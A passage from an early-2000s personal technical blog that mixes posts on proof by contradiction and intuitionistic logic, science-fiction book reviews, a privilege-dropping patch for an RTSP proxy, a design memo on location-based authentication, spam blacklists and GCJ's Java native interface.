    Now, if you look that up (e.g. on MathWorld) you'll find that it says something like "this means that A is either true or false". But it doesn't. A∨¬A means that either A or ¬A is a theorem (i.e. can be reached on our axiom tree). So it really says either A or ¬A is provable; but Gödel has shown otherwise.

    And in my logic notes the following proof of A∨¬A was given:

    1  ¬(A∨¬A)     assume
    2  A           assume
    3  A∨¬A        ∨I(2)
    4  ⊥           ¬E(1,3)
    5  ¬A          ¬I(2,4)
    6  A∨¬A        ∨I(5)
    7  ⊥           ¬E(1,6)
    8  ¬¬(A∨¬A)    ¬I(1,7)
    9  A∨¬A        ¬¬(8)

    (Box proofs are a pain to typeset in HTML)

    That means that the basis of proof by contradiction is proven using proof by contradiction. (it also has a ¬¬ elimination, but that's not the subject of this post)
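
    For anyone who wants to check the box proof mechanically, here is a rough Lean 4 sketch of the same argument. The theorem names are my own, not from any library. The first theorem corresponds to steps 1 to 8 and needs no classical axiom; the second is step 9, and it is the only place where a classical principle (`Classical.byContradiction`, which plays the role of ¬¬ elimination) gets used.

```lean
-- Steps 1-8: ¬¬(A ∨ ¬A) is provable without any classical axiom.
theorem not_not_em (A : Prop) : ¬¬(A ∨ ¬A) :=
  fun h => h (Or.inr (fun a => h (Or.inl a)))

-- Step 9: getting A ∨ ¬A itself requires double-negation elimination.
theorem em_from_dne (A : Prop) : A ∨ ¬A :=
  Classical.byContradiction (not_not_em A)
```

    So the split is clean: everything up to ¬¬(A∨¬A) is acceptable even to an intuitionist, and the whole disagreement lives in the final step.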

    Thankfully, a google shows that I'm not the only person to ever think this way. (Which makes me a little more confident that someone like Ralph or Bram isn't going to stomp me with a devastating counter argument). Intuitionistic Logic seems to be (at least) a similar school of thought. A few more links that I haven't fully digested yet:

    Book Review: Moonseed

    (Stephen Baxter, 0-061-05044-x (Hardback), 0-061-05903-x (Softback))

    Well, Edinburgh, geology and Sci-Fi. Ian (Clarke) and Matt (Key) eat your hearts out. Baxter always wrote pretty hard sci-fi but that generally means physics. This is the first time I've read a book where the science was mainly geology, but at no cost to the book. This book is novel, well written and engrossing (which is measured by the number of times I put the book down during a lecture).

    Book Review: Inner Loops

    (Rick Booth, 0-201-47960-5)

    This book deals with eking out every last cycle from Intel processors. It's looking a bit dated now (only covers up to MMX, and even then it only covers that by documentation), however many of the tricks still hold true. The author covers each chip in turn (486-PPro) and then practical applications, including random number generators and JPEG codecs.

    Generally not very useful unless you do this sort of thing often, but if you can get it from a library then it's worth a flick through.

    Proof by Contradiction is Crap

    Google is being a little useless, but I have it on decent authority that one can prove, by contradiction, that there exists a well ordered relation for ℜ. In other words; that there is a minimal real number. Think about that for a second.

    (context switch) You can look at something like metamath and find an axiom system, on top of which a sizeable amount of maths is built. Generally, all maths should be done this way but it's too tedious, so generally people don't bother being that precise in proofs, but the general idea is that they could, if they wished.

    Now you can think of the axiom system as a tree with n roots (one for each axiom). You can move from any point in a number of different ways by using a rule of inference to make a new theorem. (Ian and Will can stop shouting GEB at this point). This axiom tree branches into the space of all possible theorems.

    Now, we all hope like hell that our axiom tree only ever hits true statements. But we know that it doesn't hit all true statements (by Gödel). But when people prove by contradiction they start from a theorem and reach ⊥ (false). Since we assume that, starting from a point on the tree, we cannot reach a false statement like ⊥, they then assume that the original statement is false. Which is rubbish. What they have shown is that it isn't on the tree, and thus that it's not-provable (using that system).

    IV KeyVerify is working a...

    IV KeyVerify is working again. Now on Imperial servers.

    Testing my belief in free-speech

    From /.

    I think the key problem is ISPs that do not block egress traffic on port 25. If you need to send mail through a different SMTP server than provided by your ISP, the admin of that server ought to provide you with a means of using it with authentication on a port other than 25

    At least it was on slashdot so people know it's moronic, but good god what a prat. Because the email system is open to abuse, we should split the world in two (those deemed 'good enough' to send email and those who aren't)? Of course, the difference between those two classes would be that the former have more money. I just don't want to start on what a bad idea that is.

    (Incidentally, that does the same thing that blacklists now do, but at the other end and I think those blacklists are equally moronic.)

    Location authentication

    Someone from CyberLocator contacted me. It seems they do the location based authentication that I was talking about (and have a pretty neat way of doing it).

    Well, I spent the afterno...

    Well, I spent the afternoon trying to get Bochs to work. Unfortunately, the networking is just broken in both packet socket and tuntap mode. The problem is someplace odd in the code and I don't feel active enough to hunt it down - I found an easy bug, but that wasn't enough.

    So, kissing the feet of the statue of RMS that I keep in the corner and asking for forgiveness, I install VMWare. And what did the wonders of commercial software manage? "Cannot allocate memory" (VM is setup for 32 megs and I have > 350M free).

    I'll see if I can dig up an old box tomorrow.

    Genetic Information

    So here's your interesting fact for the day (and example of evolution in action). Viruses have an evolutionary pressure to have a small genome which means they have to pack as much information in per base pair. Here's a base breakdown for a randomly picked virus genome:

    A: 28.9% G: 23.8% T: 22.2% C: 25.1%

    And for human insulin:

    A: 17.0% G: 35.2% T: 16.7% C: 31.1%

    So we have baggy genomes and don't bother packing as much information into our coding sequences.
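
    One crude way to put a number on this is the Shannon entropy of the base frequencies: the closer the four bases are to 25% each, the closer each base pair gets to carrying the maximum of 2 bits. The Python sketch below does that for the two breakdowns above. It is a rough illustration only; the function name is mine, and single-base frequencies ignore all structure between neighbouring bases, so treat it as a proxy rather than a real measure of information content.

```python
import math

def entropy_bits(freqs):
    """Zero-order Shannon entropy, in bits per base, of a frequency table."""
    return -sum(p * math.log2(p) for p in freqs.values() if p > 0)

# Base frequencies copied from the two breakdowns above.
virus = {"A": 0.289, "G": 0.238, "T": 0.222, "C": 0.251}
insulin = {"A": 0.170, "G": 0.352, "T": 0.167, "C": 0.311}

if __name__ == "__main__":
    print("virus:   %.3f bits/base" % entropy_bits(virus))
    print("insulin: %.3f bits/base" % entropy_bits(insulin))
```

    By this measure the virus genome sits closer to the 2 bit ceiling than the insulin sequence does.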

    In extreme cases, some viruses have proteins encoded in all 3 frames. But if you don't understand that I don't have the space to explain it here.

    Will pointed me to this p...

    Will pointed me to this page for all my weird-glyphs-in-HTML needs. A quick Python script produces this useful table from that data. Your browser may not render all of these.

    AEligÆ AacuteÁ Acirc AgraveÀ AlphaΑ AringÅ Atildeà AumlÄ
    BetaΒ CcedilÇ ChiΧ Dagger DeltaΔ ETHÐ EacuteÉ EcircÊ
    EgraveÈ EpsilonΕ EtaΗ EumlË GammaΓ IacuteÍ IcircÎ IgraveÌ
    IotaΙ IumlÏ KappaΚ LambdaΛ MuΜ NtildeÑ NuΝ OEligŒ
    OacuteÓ OcircÔ OgraveÒ OmegaΩ OmicronΟ OslashØ OtildeÕ OumlÖ
    PhiΦ PiΠ Prime PsiΨ RhoΡ ScaronŠ SigmaΣ THORNÞ
    TauΤ ThetaΘ UacuteÚ UcircÛ UgraveÙ UpsilonΥ UumlÜ XiΞ
    YacuteÝ YumlŸ ZetaΖ aacuteá acircâ acute´ aeligæ agraveà
    alefsym alphaα amp& and ang aringå asymp atildeã
    aumlä bdquo betaβ brvbar¦ bull cap ccedilç cedil¸
    cent¢ chiχ circˆ clubs cong copy© crarr cup
    curren¤ dArr dagger darr deg° deltaδ diams divide÷
    eacuteé ecircê egraveè empty emsp ensp epsilonε equiv
    etaη ethð eumlë euro exist fnofƒ forall frac12½
    frac14¼ frac34¾ frasl gammaγ ge gt> hArr harr
    hearts hellip iacuteí icircî iexcl¡ igraveì image infin
    int iotaι iquest¿ isin iumlï kappaκ lArr lambdaλ
    lang laquo« larr lceil ldquo le lfloor lowast
    loz lrm lsaquo lsquo lt< macr¯ mdash microµ
    middot· minus muμ nabla nbsp  ndash ne ni
    not¬ notin nsub ntildeñ nuν oacuteó ocircô oeligœ
    ograveò oline omegaω omicronο oplus or ordfª ordmº
    oslashø otildeõ otimes oumlö para part permil perp
    phiφ piπ pivϖ plusmn± pound£ prime prod prop
    psiψ quot" rArr radic rang raquo» rarr rceil
    rdquo real reg® rfloor rhoρ rlm rsaquo rsquo
    sbquo scaronš sdot sect§ shy­ sigmaσ sigmafς sim
    spades sub sube sum sup sup1¹ sup2² sup3³
    supe szligß tauτ there4 thetaθ thetasymϑ thinsp thornþ
    tilde˜ times× trade uArr uacuteú uarr ucircû ugraveù
    uml¨ upsihϒ upsilonυ uumlü weierp xiξ yacuteý yen¥
    yumlÿ zetaζ zwj zwnj
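
    The original script isn't reproduced here, but something along these lines would generate a table of the same shape. This is a sketch, not the script I actually used: it takes the entity list from Python's standard `html.entities.name2codepoint` rather than from the page Will found, and the function name and the eight-column layout are just choices made for the example.

```python
from html.entities import name2codepoint

def entity_table(columns=8):
    """Build a text table pairing each HTML 4 entity name with its glyph."""
    names = sorted(name2codepoint)  # ASCII order: upper case sorts first
    cells = [name + chr(name2codepoint[name]) for name in names]
    rows = [" ".join(cells[i:i + columns])
            for i in range(0, len(cells), columns)]
    return "\n".join(rows)

if __name__ == "__main__":
    print(entity_table())
```

    Entities such as `nbsp`, `emsp` or `zwj` are whitespace or zero-width characters, so those cells show only the name however good the font is.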

    TCPA BIOSes

    So, AMI has released the first TCPA enabled BIOS. At first I was quite pleased as it occurred to me that it might be able to secure boot GRUB. Of course, it has all the nasty TCPA stuff too, but I'm not going to use that. If it has a write-enable jumper on the motherboard that I can bridge to write an SHA1 checksum, I would be quite happy. However, having read some of the (dry and frankly confusing) specs it doesn't even seem able to do that. So it really is utterly worthless crap.

    (Technical note: I know the BIOS only loads a bootsector into memory and checksumming that wouldn't be enough to secure it, but the boot process could be modified so that the BIOS loads the whole lot. Given what changes the TCPA are trying to inflict they wouldn't even blink at that.)

    RTSP

    RTSP is the protocol used by RealPlayer to stream its stuff. Now RealPlayer is pretty evil, but RTSP looks slightly open. At least Real provides a proxy server for it.

    We'll see how it works tomorrow, but for the moment the essential agl patch; chroot and setuidgid.

    --- rtspproxy.cpp	Fri Feb  9 23:38:53 2001
    +++ rtspproxy.cpp	Thu Jan  9 17:10:32 2003
    @@ -12,6 +12,9 @@
     #include <string.h>
     #include <signal.h>
     #include <stdarg.h>
    +#include <sys/types.h>
    +#include <unistd.h>
    +#include <grp.h>
     
     #include "app.h"
     #include "rtspproxy.h"
    @@ -1277,6 +1280,8 @@
         printf( "    -v              Print version information.\n");
         printf( "    -h              Display this help message.\n");
         printf( "    -d              Enable useful debug messages.\n");
    +    printf( "    -u <uid> <gid>  Set UID and GID.\n");
    +    printf( "    -c <path>       Chroot to path.\n");
     }
     
     int main( int argc, char** argv )
    @@ -1328,6 +1333,31 @@
             {
                 g_DebugFlagTurnedOn = true;
             }
    +	else if ( strcasecmp (argv[i], "-c" ) == 0 ) {
    +		if (i + 1 >= argc) { Usage (argv[0]); exit(1); }
    +		i++;
    +		if (chroot (argv[i]) == -1) { perror ("Failed to chroot"); exit(1); }
    +		if (chdir ("/") == -1) { perror ("Failed to chdir after chroot"); exit (1); }
    +	}
    +	else if ( strcasecmp (argv[i], "-u" ) == 0 ) {
    +		if (i + 1 >= argc) { Usage (argv[0]); exit(1); }
    +		i++;
    +		uid_t uid = atoi ( argv[i] );	/* uid_t, not INT16, so large ids are not truncated */
    +		if (uid == 0) { printf ("Bad uid\n"); exit (1); }
    +		if (i + 1 >= argc) { Usage (argv[0]); exit(1); }
    +		i++;
    +		gid_t gid = atoi ( argv[i] );
    +		if (gid == 0) { printf ("Bad gid\n"); exit (1); }
    +		
    +		if (setgroups (1, &gid) == -1 || setgid (gid) == -1) {	/* drop the primary gid too, before setuid */
    +			perror ("failed to set groups or gid");
    +			exit (1);
    +		}
    +		if (setuid (uid) == -1) {
    +			perror ("failed to set uid");
    +			exit (1);
    +		}
    +	}
         }
     
         app.Run();
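
    The order of operations is the part that is easy to get wrong, so here is the same idea as a small Python sketch. It is not part of the patch: the function name `confine` and the `osmod` parameter (which only exists so the call order can be checked without being root) are invented for this example. The calls themselves are the standard `os.chroot`, `os.chdir`, `os.setgroups`, `os.setgid` and `os.setuid`.

```python
import os

def confine(root, uid, gid, osmod=os):
    """Chroot into `root`, then drop to `uid`/`gid`. Must be started as root.

    Hypothetical helper for illustration. `osmod` defaults to the real
    `os` module; a stand-in can be passed to inspect the call order.
    """
    if uid == 0 or gid == 0:
        raise ValueError("refusing to keep uid or gid 0")
    osmod.chroot(root)       # needs root, so it has to come first
    osmod.chdir("/")         # do not keep a working directory outside the jail
    osmod.setgroups([gid])   # clear supplementary groups
    osmod.setgid(gid)        # drop the primary group while still root
    osmod.setuid(uid)        # last: after this nothing above is permitted
```

    The uid change goes last because every earlier step needs root; once `setuid` has succeeded there is no way back.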
    

    Jon Lech Johansen has bee...

    It seems that some people...

    It seems that some people (well, at least one) think that I have an Avi (from Cryptonomicon) style obsession with WW2. I guess that comes from the picture and quote above. So just to prove that I don't really, and there's nothing WW2 about IV's other content, try it in:

    Maybe I should do a few more and have it rotate each day

    Today has been an utterly ...

    Today has been an utterly fucking shit day; worst day I've had in over a year. So, if you'll excuse me I just need to..

    AAAAAAAAAAAAAAAAAAAGGGGGGGGGGHHHHHHHHHH!!!!!!!!!!!!!!!!

    Right. Here's hoping tomorrow is better.

    The management apologise for that brief interruption.

    The department has a list o...

    The department has a list of projects that people want doing. Sometimes they are specific and sometimes more in the form of "I wonder...". Here's the text of an I wonder project that I did in a loose hour today. Might be interesting for some people.

    Detection of User Location 
    -------------------------- 
    Adam Langley, agl@imperialviolet.org
    
    Problem:
    
    "How can we reliably identify whether users are physically located in
    any particular region when they access our systems across the LAN/WAN
    (so that we can control what data access that have given different
    secrecy constraints)."[0]
    
    Since the system is to be accessed across a network the only proof of
    location we can offer is information. Since the server's view of the
    world is limited to the data that passes through its network card it
    must trust another device to tell it the location of a user requesting
    some service.
    
    Having the server trust some special code is trivially vulnerable to a
    replay attack. Thus, in order for the server to know the location of a
    user, a challenge-response protocol must be used, and the challenges
    must timeout.
    
    The obvious answer to the problem of a trusted device to handle location
    is a system based around a GPS receiver that the user possesses. The
    problems with this are threefold:
    
    Firstly, in order for the server to trust the device it must be
    tamper-resistant. The level of tamper-resistance required varies with
    the security needs of the server, but if a location based security
    policy is even being considered then it's reasonable to expect that the
    server has some pretty impressive security needs and, correspondingly,
    that the device needs to be highly tamper-resistant.
    
    Unfortunately, strong tamper-resistance is a difficult problem.
    Companies such as Cambridge Aero Instruments[1] manufacture
    tamper-resistant GPS systems for applications such as gliding
    competitions (so that the contestants can prove that they reached the
    checkpoints). However, such a GPS system would have to be integrated
    into a package that also contains enough processing power to perform
    public-key cryptography (such as an IBM 4758). This is likely to be
    prohibitively expensive.
    
    Secondly, the GPS system[2] has no authentication built in. Even if the
    device were perfectly tamperproof there would be nothing preventing an
    attacker putting it in a Faraday cage and faking the GPS signals.
    
    Thirdly, GPS jamming is reasonably simple[3]. A DoS attack could be
    launched against a secure installation (where these devices are used) by
    jamming GPS signals.
    
    These aforementioned problems with GPS suggest that a trusted device
    should know its location by other means, such as its immobility. Assuming
    that areas that are considered secure locations (by this system) are
    physically controlled then it would be reasonable to use much less
    tamper-resistance as the equipment and time available to an attacker
    would be limited[4]. Thus the reduced tamper-resistance required makes
    the cost viable. The method of keeping it in place remains to be decided.
    
    The interface of such a device deserves some consideration. A user must
    present a server generated challenge and pass the reply back to the
    server within the time limit. Since a strong connection to physical
    location must be preserved, a physical interface is appropriate; a
    keyboard for input and a till printer for output. The output could be a
    monitor, but since the replies are going to be quite complex (say, 160
    bits base64 encoded) then the users are going to write them down anyway
    so a till printer will save them the time and effort. Postit notes and a
    pen should be provided by the terminals for the same reason.
    
    The challenges are not sensitive and the replies are only valid for a
    short time (to be determined) and only on a single terminal. (It goes
    without saying that man-in-the-middle attacks against the terminals must
    be prevented by the cryptographic protocol). Also, it must be considered
    that this location authentication is a hassle for the user and (with the
    security requirements in mind) the number of authentications in a given
    time should be less than for other schemes (such as passwords).
    
    Conclusions
    -----------
    
    A location authentication system is certainly possible given a number of
    assumptions:
    	* that locations considered secure by the system are physically
    	  secure against people bringing in certain equipment (such as
    	  X-ray machines[4] and shaped charges[5]) and spending long
    	  amounts of time physically attacking the trusted location box
    	* that the terminals are trusted not to leak the information
    	  once accessed, or to allow a man-in-the-middle attack
    And at certain costs:
    	* Inconvenience for the user
    	* User training
    	* A trusted location box per location
    Much remains unconsidered:
    	* The details of cryptographic chal-rep protocol
    	* The design and cost of the trusted location box
    	* The method of keeping the trusted location box in place
    	* The human factors, such as the presentation of the data and
    	  the length of the timeout
    
    [0] http://www.doc.ic.ac.uk/%7Esjn5/docpp/cgi-bin/
        display_project.cgi?project=709
    [1] http://www.cambridge-aero.com/
    [2] http://www.phrack.com/phrack/55/P55-14
    [3] http://www.phrack.org/phrack/60/p60-0x0d.txt
    [4] Security Engineering, Ross Anderson, Chapter 14
    [5]                                      Chapter 11, Section 5
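
    The memo leaves the protocol details open, so the following is only a sketch of the challenge, reply and timeout flow it describes. Everything in it is an assumption made for illustration: the function names, the 60 second timeout, and above all the use of a shared-secret HMAC-SHA1 in place of the public-key scheme the memo has in mind (it happens to give a 160 bit reply, which is the size the memo mentions).

```python
import base64
import hashlib
import hmac
import os

TIMEOUT_SECONDS = 60  # assumed value; the memo leaves the timeout open

def new_challenge():
    """Server side: a fresh random challenge, short enough to type in."""
    return base64.b32encode(os.urandom(5)).decode("ascii")

def box_reply(key, challenge):
    """Location box: 160-bit keyed reply, base64 encoded for the printer."""
    mac = hmac.new(key, challenge.encode("ascii"), hashlib.sha1).digest()
    return base64.b64encode(mac).decode("ascii")

def server_verify(key, challenge, issued_at, reply, now):
    """Server side: accept only a correct reply inside the time window."""
    if now - issued_at > TIMEOUT_SECONDS:
        return False  # a stale reply is worthless, which defeats replay
    expected = box_reply(key, challenge)
    return hmac.compare_digest(expected, reply)
```

    In use, the server records the time when it issues a challenge, the user types the challenge into the box, and the printed reply is passed back with `now` taken from the server's clock. A shared secret means the server could forge replies itself, which is one reason a real design might prefer signatures.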
    

    newdocms

    Oops. Looks like I missed actually uploading the tarball for bttrackd. I wonder how long that's been broken - months I guess.

    This came up on slashdot today. It's an attempt to replace standard filesystems with a string-string metadata based system and categorisation. The metadata is pretty standard and the categorisation is hierarchical. Read the page, it's pretty neat and, above all, it's real code.

    Now, this kind of thing is one of my pet subjects so I have a couple of criticisms. Firstly, string-string metadata loses some useful functionality of string-object systems. If the author of a document is "John Smith" then I cannot simply ask for the author's email address because the string "John Smith" is only loosely coupled to the object (if it exists) that describes that person. Also, the author doesn't try to extend the idea very far. He sees it as a way of filing documents (which is all well and good), but this is far short of what vaporware like IronDoc and landscape try to do. Then again, worse is sometimes better and he has code behind him.
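
    The difference is easy to show in a few lines of Python. This is a toy model with names I made up for the example (the `Person` class, the dictionaries, the email address); it is not how newdocms or any of the other systems store anything.

```python
from dataclasses import dataclass

@dataclass
class Person:
    name: str
    email: str

# String-string metadata: the author is just a label.
string_meta = {"title": "Quarterly report", "author": "John Smith"}

# String-object metadata: the author is a link to a richer object.
john = Person(name="John Smith", email="john.smith@example.org")
object_meta = {"title": "Quarterly report", "author": john}

def author_email(meta):
    """Follow the author link to an email address, if there is one."""
    return getattr(meta["author"], "email", None)
```

    With the string version `author_email` has nothing to follow and returns `None`; the best you could do is search elsewhere for something that happens to be called "John Smith".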

    A couple of recent patche...

    A couple of recent patches:

    • xchat-1.9.8-treeview.diff - adds treeview support to Xchat 1.9.x. Not really fully tested but it seems to work. God knows what the GTK developers were on when they designed their new tree widget though.
    • wget-patch - stops wget from stripping // from URLs. This is needed for Freenet.

    First blog of the new yea...

    First blog of the new year! (of course, being in the UK, I get a 5-8 hour advantage over most people).

    Fallen Dragon

    Book reviews today...

    (Peter F. Hamilton, 0-330-48006-5)

    I've always really enjoyed Hamilton's books; every single one of them. Night's Dawn is an incredible epic and I highly recommend it if you're ever stuck on a desert island for a few weeks.

    Fallen Dragon is set in a different universe to his other books, though there are many similar ideas (like genetic enhancement and neural interfaces). I've never felt that Hamilton wrote very deep sci-fi like Baxter or Egan, but he tells a fantastic story.

    This particular fantastic story is totally centered about one person and it's told from two different points in time at once. Each chapter alternates between this guy's childhood and a point much further on in his life. As you read about the earlier experiences, the later ones start to make more sense and by the end of the book the early thread is up to where the later one started.

    The ending I won't talk much about because it will spoil the book. It's a good ending (which is foreshadowed, but I didn't make the connection till afterwards), but I can't help but feel it raises more questions than it answers.

    Anyway; if you see it, consider buying; you'll enjoy it.

    Prey

    (Michael Crichton, 0066214122)

    Well, it's another Crichton. Never deep, but a couple of neat ideas. If you have read Timeline then you know the style. I get the feeling it was written with a film in mind. It's not long (I finished it in a night), nor taxing. I wouldn't buy it, but don't run screaming if it drops on your doorstep either.

    Atlas Shrugged

    (Ayn Rand, 0-451-19114-5)

    Zooko persuaded me to read this huge book, and I'm quite glad that I did (thanks Zooko). It really is long (and I must admit that I skipped most of the Galt monologue) but it's quite enjoyable.

    It doesn't change my view of the issues she covers one little bit though. It's pretty much the minarchist capitalist manifesto, which is nice because I quite like minarchist capitalism. Rand is a little more minarchist than I am, but that's ok.

    Interestingly enough she doesn't cover environmental issues at all (despite dealing with railroads and steel mills) which is a shame because that's one of the main arguments people beat anarchists/extra-minarchists with. But then, being American, the thought might never have occurred to her.

    In the end, I don't really like arguing about exactly what form of government would be best in a world where they are rapidly going in totally the wrong direction. It just seems a little pointless.

    It's a decent book; maybe a little too long. One might want to try The Moon is a Harsh Mistress for something smaller.

    15 Idiots Rule the World

    A new article from Paul Graham predicting the end of spam. Nice to hear after the year of doom mongers predicting the end of email because of spam and, in terms of who I'd side with in an argument, Paul Graham rates just a little higher.

    Back in London. I was onl...

    Back in London. I was only loafing about at home, so I might as well loaf about someplace with a better connection. I'm sure the monkey running the ticket till overcharged me (23.50 for a single to London) but the pricing structure for the railways is so damn complex you can't tell. Also, the train didn't even advertise that it was stopping where I wanted it to. I just got on and hoped that Railtrack wasn't fibbing to me (they weren't, but it's still crappy).

    I've just rsync'ed Gentoo - crap there's a lot of new stuff. I wish Gentoo had a way of only upgrading stuff which has jumped in upstream release number.

    Over the Xmas break I've had a cluster of P4's in the Imperial labs generating keys for coderman who (I guess) wants them to test this idea. By the last count he had 150000 keys and was winding up, so I'm giving the lab computers a break now. A couple of things that I'll probably end up looking up later:

    • Don't bother reading the screen manpage for how to start a detached session - it doesn't work right. Instead do: screen /bin/sh -c "screen -d ; cmd ; cmd ; cmd"
    • Padding a number with zeros in a shell script: `printf "%02d\n" $x` (that pads to length 2)

    Britain leads the world again

    coderman:

    if I laugh in a nihilistic euphoria any harder I am going to burst a spleen

    a spleen? You have a backup?

    So, the US wants to monitor all its net traffic? (NYT link: user/passwd = strsnyt). Well, the UK has had that for years, but here the "early warning centre" is called the GTAC (Govt Technical Advisory Centre, or something). And the US pretends that it leads the world in technical matters...

    After reading Aaron's Cre...

    After reading Aaron's Creative Commons launch talk I emailed him to ask exactly when some cool semantic webby stuff was going to happen. (I've ranted about this before). Well, quoting private emails is a little rude but he didn't seem to hold much hope of it happening anytime soon, which is a great shame. Unfortunately, I can't see any good way of solving this. Specs for a Person class, a Blog class and all manner of stuff could be constructed, but I don't know how we would persuade anyone to use it:

    "Hey! Markup all the stuff on your website using our cool RDF!"
    "Why?"
    "'Cos it's cool, look!" (point at some of the SemWeb vision stuff)
    "Hmm, that's neat. But what will it do now?"
    "Not a lot, I guess. But think how cool it will be in the future!"
    "So ask me again in the future, when it's cool"

    And so we're stuck. So does anyone have a SemWeb killer app to bootstrap everything?

    Mobile Phones

    Mixminion 0.0.1 has been released, and the first Mixminion anonymous message was posted to the mailing list. Congrats to the whole team.

    Also, the new edition of Unix Power Tools (O'Reilly) is out. I was a technical reviewer on this and it's everything you would expect from O'Reilly (even if UPT would be preaching to the converted for most of IV's readership). There is one chapter about which they seem to have ignored my comments. But then my comments were something along the lines of "This is rubbish, put this in instead ..." followed by the whole chapter rewritten. I'll let you see if you can guess which chapter.

    The whole concept of phoning someone is a little broken. I want to be able to attach a priority to calls. If I need something now - it's a high priority call, if I just want to chat - it's low priority, and it's a persistent thing. When I get in from doing something (a high priority only state) I can drop to a low priority state and take all the low priority calls (so long as the people calling me are still in a low priority state). I'm sure you get the idea.

    (I'm at home, in Chelt, f...

    (I'm at home, in Chelt, for christmas)

    I had hoped to have IV hosted (web and email at least) on Imperial servers by now. Unfortunately, one of the Dept of Computing webservers was rooted on Thursday which meant that people were a little too busy to get round to it. I'm going to see metis (the current server) tomorrow with a new power supply anyway.

    And in answer to coderman's question: see this, this and this for an example of what crewing an event means. We started rigging that at 9am, people came in at 8pm, left at 2am (the following day) and we had cleared up by 4:30am (after which we went to the bar). This was taken about 5 in the morning (I'm the one on the far left).

    Freenet server problems

    It's been a Bad Server Weekend (tm).

    Firstly, hawk's outgoing SMTP relay started refusing to relay because hawk got listed as a dialup IP and the relay has spam blacklisting. (hawk is Freenet's server for stuff like mailing lists). Now, I'm not going to rant about spam blacklisting here because I'm not going to change anyone's mind about it. I can only suggest you look at alternatives like SpamAssassin and the new breed of Bayesian filters.

    Anyway, as a bodge I just set hawk to send email directly which worked for some people until Ian found another relay. However, since some of the lists which were blacklisting hawk gave contact details I tried emailing them:

    It's our understanding that all of 4.46.0.0 - 4.46.119.255
    is dynamic IP Verizon DSL.  As dynamic IP space, it's appropriate for it to be
    in our list.
    
    BTW...the addition of this space was prompted by abuse of this IP space by a
    professional spammer that has been spamming from a Verizon DSL account with
    dynamic IPs moving around this range for the past few months.
    

    I emailed back and the guy basically refused. But from a different blacklist admin...

    Fixed in the next update. Thanks.

    So they aren't all bad.

    When it rains, it pours

    And once hawk was running again ... metis (this server) promptly died. I still don't know what happened as I haven't phoned since it came back online. It wasn't a power cut (the UPS didn't kick in if it was) and I hope it wasn't another rat pissing in the power supply. Anyway, it's running again but I really am going to move it to IC soon.

    And I was this close to 100 days uptime. (it was about 98 days when it died).

    Good Software

    Mozilla 1.2 really works well. It doesn't crash. It's pretty fast. Copy and paste has started working again after 1.0. Nice.

    Also, Straw is a good GTK feedreader. I'm using it for the moment.

    Mark Thomas

    Last night I went to see Mark Thomas at the SoHo theatre. For those who don't know of him (most of you) he's sort of a stand up comedian with a strong political bent. Basically, he makes you laugh talking about stuff like campaigning against the War on Iraq. If you ever get the chance to see him I strongly suggest you jump at it like a rabid ferret.

    As a side note, he's in court today trying to get an order to prevent the government going to war with Iraq without a new UN resolution. I donated to the legal fees and here's hoping he wins.

    Java CNI

    A quick lesson in the wonders of how Java and GCC work together.

    For quite a while now, the GCJ project has been adding Java support to GCC. It isn't perfect and building your big, uses-every-API Java app with it could be a real pain. But it is getting better. Anyway, this is about working together.

    Java has always had JNI for interfacing with other languages (generally C/C++). It works, but it's not exactly clean. GCJ, however, has the CNI which works much more nicely. A small example:

    Make up a Java class and have some methods marked as native:

    class CNITest {
    	// Implemented in C++ below; takes and returns an int.
    	public static native int native_call (int a);
    
    	public static void main (String[] args) {
    		native_call (1);
    	}
    }

    Build a class file and generate the header from it

    gcj -C CNITest.java
    gcjh CNITest

    Write the native methods in whatever language you like (given that GCC can compile and link it with Java). In this case C++:

    #include "CNITest.h"
    
    // Native implementation of CNITest.native_call.
    jint CNITest::native_call (jint a)
    {
            return a + 1;
    }

    Now build it all:

    gcj --main=CNITest -o cni CNITest.java cni.cpp

    and it all works. Woo!

    Stallman Speaking

    Went to listen to Stallman speaking on software patents at LSE today. He managed to panic the organiser when he didn't show, but after about 20 minutes someone said he had been spotted outside the tube station. Quite how he had been `spotted' I'm not sure, but he turned up 5 minutes later and things got underway.

    The venue was quite small and there were about 50 people there. For some reason the room (The Hong Kong theater) reminded me of Korea in the way that it looked like someone gave the architect a picture of an old church room and said "build it like this", but the architect didn't quite get it right.

    Anyway, a lot of people criticise RMS for, basically, losing his rag when he speaks but I guess he must have this speech pretty well practiced. In fact, maybe if he had lost his rag, I wouldn't have fallen asleep during it. It's not that it was boring, I was just pretty tired and it's almost instinctive when sitting in a lecture now.

    There's little point in repeating what RMS said as I would just be preaching to the converted. See this if you don't know it all already and RMS really is Quite A Nice Guy in person.

    Summer Jobs

    Ok, it's a little early but I'm looking about for summer jobs anyway. I have an interview tomorrow for a job doing door-to-door book selling in Nashville (weird, but what the hell). I'd quite like to work for O'Reilly in Boston, but they aren't really in a place to start employing people at the moment. So, if you want to offer me a job, you know where the email address is.

    /dev isn't enough

    Rumors abound that Longhorn will have a new database file system. Of course, since it's Windows, nobody really cares because M$ have been talking about this since before 95 came out and we are still waiting. In fact, Ted Nelson[1][2] was talking about the same kind of ideas long before most of the people reading this were born.

    Ted Nelson's ideas about this were known as Xanadu and Zigzag (a specific implementation). Basically, all data was contained in cells and cells could be linked along axes. The GZZ project (formerly known as GZigZag) has a good document about these ideas.

    But, at its simplest level, it's about linking and it's about exposing. Now the classic system for this is the UNIX device system which exposes hard drives and other IO stuff pretty well. However, UNIX devices aren't exactly perfect. See this document about Plan9 for an example of the device model taken to a more useful level.

    But even in Plan9, data is still locked away in odd file formats and that means a lack of linkability and exposure.

    Take my mailbox: there's a huge amount of data in there locked away. I can't get a list of all the mail sent to me by a single person without a lot of work (see interwingle). Now you are free to say that it's a facet of how I store my mail (mbox format). But when I want to follow a link from an email, to its sender, to his/her phone number (in another database) it ceases to be a problem limited to my MUA. If certain things were exposed better I should be able to do that, and follow links to anything else related I have about a person. This has harmonies with Semantic Web ideas, but this is about a human web of information - not a machine understandable one.

    Hans Reiser articulates similar ideas (possibly better than I do) in his whitepaper. Now, Hans sets down a lot more detail than I'm doing here, and I don't necessarily agree with all the detail (which you can skip anyway).

    Now, I've talked about this before and there is a strong link between the language parts of that rant and the ideas here, but I'm not going to go into that now.

    more to follow...

    Blogdex Spamming

    It seems that along with Referer spamming, SMB spamming, and all the old fashioned manifestations of this vile practice, we now have blogdex spamming. It looks like it's something akin to google bombing.

    The blogdex front page currently contains many entries like PremiumDomains - www.pornovideo.bz - DOMAINS FOR SALE and so on. Looking at the track page it seems that 8 sites in the ubiquitous.nu domain have been registered with blogdex and are successfully bombing it. Raph is going to have a field day.

    A younger Ashcroft on go...

